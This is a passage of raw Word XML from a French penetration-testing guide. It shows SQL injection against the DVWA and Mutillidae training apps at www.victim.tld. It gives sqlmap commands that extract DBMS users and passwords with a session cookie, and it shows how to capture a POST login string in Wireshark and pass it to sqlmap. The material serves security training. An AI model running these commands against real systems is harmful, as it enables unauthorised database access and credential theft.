        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F874FB">
        <w:t xml:space="preserve">La commande suivante </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">récupère </w:t>
      </w:r>
      <w:r w:rsidRPr="00F874FB">
        <w:t xml:space="preserve">plusieurs informations sur la DBMS, </w:t>
      </w:r>
      <w:r>
        <w:t>don</w:t>
      </w:r>
      <w:r w:rsidRPr="00F874FB">
        <w:t xml:space="preserve">t </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la liste </w:t>
      </w:r>
      <w:r w:rsidRPr="00F874FB">
        <w:t>des utilisateurs de la DBMS, etc.</w:t>
      </w:r>
      <w:r w:rsidR="006C3E4D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F874FB">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:r w:rsidR="006C3E4D" w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>www.victim.tld/dvwa/vulnerabilities/sqli/?id=a&amp;Submit=Submit</w:t>
      </w:r>
      <w:r w:rsidR="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>cookie="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>low</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>PHPSESSID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>=b0fa6e8a78826ec5969021e5aa7641f7" --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>is-dba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>current-db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>current</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>-user --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C3E4D">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>passwords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C62D58D" w14:textId="77777777" w:rsidR="004133B6" w:rsidRPr="004133B6" w:rsidRDefault="004133B6" w:rsidP="006B20BD"/>
    <w:p w14:paraId="2D36E3CC" w14:textId="09A0D34F" w:rsidR="004B153E" w:rsidRDefault="004133B6" w:rsidP="00552EC6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03FA9A27" wp14:editId="654E76ED">
            <wp:extent cx="5435990" cy="3421866"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="19" name="Image 1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51" cy="342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5F95" w14:textId="1569327E" w:rsidR="00836D0F" w:rsidRDefault="004B153E" w:rsidP="004B153E">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc303426684"/>
      <w:r w:rsidRPr="004B153E">
        <w:t>Injection SQL avec requête POST</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="15E0A19E" w14:textId="77777777" w:rsidR="00840515" w:rsidRPr="00840515" w:rsidRDefault="00840515" w:rsidP="00840515"/>
    <w:p w14:paraId="79D72E79" w14:textId="0BF4EB5F" w:rsidR="004B153E" w:rsidRPr="00216A0A" w:rsidRDefault="00836D0F" w:rsidP="00836D0F">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lors de la phase de Scan, nous avons repéré une URL contenant un formulaire d’authentification vulnérable à l’injection SQL : </w:t>
      </w:r>
      <w:r w:rsidRPr="00836D0F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>www.victim.tld/mutillidae/index.php?page=login.php</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>La pr</w:t>
      </w:r>
      <w:r w:rsidR="00905918">
        <w:t xml:space="preserve">emière étape est de récupérer </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00905918">
        <w:t>la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> string envoyée</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> lors de l’exécution du formulaire en POST. Pour cela deux solutions s’offrent à nous. La première est que le scanner de vulnérabilité</w:t>
      </w:r>
      <w:r w:rsidR="006C49BD">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nous donne </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cette</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> string. La deuxième est de récupérer </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cette</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> string grâce à </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Pour récupérer </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>la</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D110B8">
        <w:t xml:space="preserve">string avec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D110B8">
        <w:t>Wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D110B8">
        <w:t>, effectuer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> l’opération de tentative de connexion sur le formulaire cible en capturant au même moment les </w:t>
      </w:r>
      <w:r w:rsidR="002A0827">
        <w:t xml:space="preserve">paquets avec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002A0827">
        <w:t>Wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A0827">
        <w:t>. Utiliser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> le filtre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00836D0F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>http.request.method</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00836D0F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> == "POST"</w:t>
      </w:r>
      <w:r w:rsidRPr="00383FBC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dans </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour récupérer le paquet qui n</w:t>
      </w:r>
      <w:r w:rsidR="002A0827">
        <w:t>ous intéresse. Ensuite cliquer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> droit sur la ligne contenant la string </w:t>
      </w:r>
      <w:r w:rsidR="005A376C">
        <w:t>POST du formulaire et choisir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00836D0F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Copy</w:t>
      </w:r>
      <w:r w:rsidR="002A0827">
        <w:t xml:space="preserve"> et cliquer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sur </w:t>
      </w:r>
      <w:r w:rsidRPr="00836D0F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Value</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> afin de copier la valeur dans le presse-papier. Dans notre exemple la string POST a la valeur : </w:t>
      </w:r>
      <w:r w:rsidRPr="00836D0F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00836D0F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00836D0F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00836D0F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>a&amp;password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00836D0F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00836D0F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>a&amp;login-php-submit-button</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00836D0F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">=Login" </w:t>
      </w:r>
      <w:r w:rsidRPr="00836D0F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="002A0827">
        <w:t>Taper</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ensuite la commande, afin de vérifier que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> détecte également la vulnérabilité : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07529">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07529">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -u</w:t>
      </w:r>
      <w:r w:rsidR="00F07529">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F07529">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> "www.victim.tld/mutillidae/index.php?page=login.php" --data "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07529">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07529">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07529">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>a&amp;password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07529">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07529">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>a&amp;login-php-submit-button</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07529">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>=Login"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600D4B3A" w14:textId="77777777" w:rsidR="00216A0A" w:rsidRPr="00216A0A" w:rsidRDefault="00216A0A" w:rsidP="00216A0A"/>
    <w:p w14:paraId="68C852A5" w14:textId="126C6CEA" w:rsidR="00216A0A" w:rsidRPr="00216A0A" w:rsidRDefault="00216A0A" w:rsidP="00552EC6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568F7080" wp14:editId="6AADE968">
            <wp:extent cx="5443608" cy="3788968"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="Image 21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608" cy="378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A0A" w:rsidRPr="00216A0A" w:rsidSect="0042381E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1F79BB" w:rsidRDefault="001F79BB" w:rsidP="001254EC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="244D1BAF" w14:textId="77777777" w:rsidR="001F79BB" w:rsidRDefault="001F79BB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1F79BB" w:rsidRDefault="001F79BB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962DB">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
        <w:r>
          <w:t xml:space="preserve"> sur </w:t>
        </w:r>
        <w:r w:rsidR="00C962DB">
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C962DB">
          <w:instrText xml:space="preserve"> NUMPAGES   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r w:rsidR="00C962DB">
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00C962DB">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r w:rsidR="00C962DB">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="4630705B" w14:textId="77777777" w:rsidR="001F79BB" w:rsidRDefault="001F79B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1F79BB" w:rsidRDefault="001F79BB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962DB">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
        <w:r>
          <w:t xml:space="preserve"> sur </w:t>
        </w:r>
        <w:r w:rsidR="00C962DB">
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C962DB">
          <w:instrText xml:space="preserve"> NUMPAGES   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r w:rsidR="00C962DB">
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00C962DB">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r w:rsidR="00C962DB">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="4AB3CE1B" w14:textId="77777777" w:rsidR="001F79BB" w:rsidRDefault="001F79B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1F79BB" w:rsidRDefault="001F79BB" w:rsidP="001254EC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4BA4A80B" w14:textId="77777777" w:rsidR="001F79BB" w:rsidRDefault="001F79BB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1F79BB" w:rsidRDefault="001F79BB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1F79BB" w:rsidRDefault="001F79BB" w:rsidP="00BD32CD">
    <w:pPr>
      <w:pStyle w:val="En-tte"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:noProof/>
        <w:lang w:eastAsia="fr-FR"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="4065AF02" w14:textId="77777777" w:rsidR="001F79BB" w:rsidRDefault="001F79BB" w:rsidP="00F57605">
    <w:pPr>
      <w:pStyle w:val="En-tte"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="17F7ADA8" w14:textId="77777777" w:rsidR="001F79BB" w:rsidRPr="009A17B7" w:rsidRDefault="001F79BB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13CDB5EA" w14:textId="77777777" w:rsidR="001F79BB" w:rsidRPr="00DA4FD5" w:rsidRDefault="001F79BB" w:rsidP="00F57605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1F79BB" w:rsidRDefault="001F79BB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1F79BB" w:rsidRDefault="001F79BB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C3-CONFIDENTIEL</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="59EFB50E" w14:textId="77777777" w:rsidR="001F79BB" w:rsidRDefault="001F79BB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749CA84F" w14:textId="77777777" w:rsidR="001F79BB" w:rsidRDefault="001F79BB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38F1C3EE" w14:textId="77777777" w:rsidR="001F79BB" w:rsidRPr="009A17B7" w:rsidRDefault="001F79BB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5BA4127A" w:rsidR="001F79BB" w:rsidRPr="001D50F6" w:rsidRDefault="001F79BB" w:rsidP="00F57605">
    <w:pPr>
      <w:ind w:left="-426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D5D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8DF69D94"/>
    <w:lvl w:ilvl="0" w:tplc="241A58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D73D3F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C5525CC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2A0592F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="557A7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17D8D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07283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2454C"/>
    <w:rsid w:val="000246A9"/>
    <w:rsid w:val="00053A2B"/>
    <w:rsid w:val="000672DC"/>
    <w:rsid w:val="000B593F"/>
    <w:rsid w:val="001244EB"/>
    <w:rsid w:val="001254EC"/>
    <w:rsid w:val="00134DEE"/>
    <w:rsid w:val="0013585B"/>
    <w:rsid w:val="00141ED9"/>
    <w:rsid w:val="00150E9E"/>
    <w:rsid w:val="001800C5"/>
    <w:rsid w:val="001D50F6"/>
    <w:rsid w:val="001F79BB"/>
    <w:rsid w:val="002073E2"/>
    <w:rsid w:val="00216A0A"/>
    <w:rsid w:val="00235787"/>
    <w:rsid w:val="002A0827"/>
    <w:rsid w:val="002B0A24"/>
    <w:rsid w:val="002B56C4"/>
    <w:rsid w:val="003136DE"/>
    <w:rsid w:val="00332AC8"/>
    <w:rsid w:val="00371619"/>
    <w:rsid w:val="003915C3"/>
    <w:rsid w:val="003B44AB"/>
    <w:rsid w:val="003E7334"/>
    <w:rsid w:val="004133B6"/>
    <w:rsid w:val="0042381E"/>
    <w:rsid w:val="00432029"/>
    <w:rsid w:val="00457D4F"/>
    <w:rsid w:val="00462A3D"/>
    <w:rsid w:val="004863C8"/>
    <w:rsid w:val="00487CC8"/>
    <w:rsid w:val="004B153E"/>
    <w:rsid w:val="004F36DE"/>
    <w:rsid w:val="00506A39"/>
    <w:rsid w:val="00522C4F"/>
    <w:rsid w:val="00552EC6"/>
    <w:rsid w:val="00586869"/>
    <w:rsid w:val="005A0609"/>
    <w:rsid w:val="005A1DF7"/>
    <w:rsid w:val="005A376C"/>
    <w:rsid w:val="005F654F"/>
    <w:rsid w:val="00610DA8"/>
    <w:rsid w:val="0061338D"/>
    <w:rsid w:val="006227FB"/>
    <w:rsid w:val="00663BF8"/>
    <w:rsid w:val="00686EF5"/>
    <w:rsid w:val="006A4CD1"/>
    <w:rsid w:val="006B20BD"/>
    <w:rsid w:val="006C3E4D"/>
    <w:rsid w:val="006C49BD"/>
    <w:rsid w:val="006D3BDC"/>
    <w:rsid w:val="006D4D89"/>
    <w:rsid w:val="006F5434"/>
    <w:rsid w:val="00716D02"/>
    <w:rsid w:val="007A2AD2"/>
    <w:rsid w:val="00800C57"/>
    <w:rsid w:val="00816019"/>
    <w:rsid w:val="00817F79"/>
    <w:rsid w:val="00836D0F"/>
    <w:rsid w:val="008373A4"/>
    <w:rsid w:val="00840515"/>
    <w:rsid w:val="00853347"/>
    <w:rsid w:val="00884C1E"/>
    <w:rsid w:val="00905918"/>
    <w:rsid w:val="00914BF5"/>
    <w:rsid w:val="00935BC6"/>
    <w:rsid w:val="009D569B"/>
    <w:rsid w:val="00A033E0"/>
    <w:rsid w:val="00A41418"/>
    <w:rsid w:val="00A62A32"/>
    <w:rsid w:val="00A70638"/>
    <w:rsid w:val="00AC774C"/>
    <w:rsid w:val="00B518FE"/>
    <w:rsid w:val="00B53261"/>
    <w:rsid w:val="00B54670"/>
    <w:rsid w:val="00B8191E"/>
    <w:rsid w:val="00B844D8"/>
    <w:rsid w:val="00BA5C40"/>
    <w:rsid w:val="00BD32CD"/>
    <w:rsid w:val="00C026E2"/>
    <w:rsid w:val="00C107B2"/>
    <w:rsid w:val="00C237F5"/>
    <w:rsid w:val="00C44060"/>
    <w:rsid w:val="00C554B4"/>
    <w:rsid w:val="00C66BEC"/>
    <w:rsid w:val="00C777FF"/>
    <w:rsid w:val="00C93413"/>
    <w:rsid w:val="00C962DB"/>
    <w:rsid w:val="00D110B8"/>
    <w:rsid w:val="00D2512D"/>
    <w:rsid w:val="00D335DB"/>
    <w:rsid w:val="00D74E90"/>
    <w:rsid w:val="00D865BD"/>
    <w:rsid w:val="00DB36D5"/>
    <w:rsid w:val="00DC1CE1"/>
    <w:rsid w:val="00DC3182"/>
    <w:rsid w:val="00DC3E8C"/>
    <w:rsid w:val="00E20691"/>
    <w:rsid w:val="00E3702B"/>
    <w:rsid w:val="00F07529"/>
    <w:rsid w:val="00F10CC3"/>
    <w:rsid w:val="00F158F1"/>
    <w:rsid w:val="00F57605"/>
    <w:rsid w:val="00F967AA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B546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2A3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2A32"/>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Grande" w:eastAsia="Times New Roman" w:hAnsi="Lucida Grande" w:cs="Arial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B546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2A3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2A32"/>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Grande" w:eastAsia="Times New Roman" w:hAnsi="Lucida Grande" w:cs="Arial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4A160-6335-7D4A-A376-C3107C1E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1115</Words>
  <Characters>6133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101</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-25T08:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-09-09T12:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>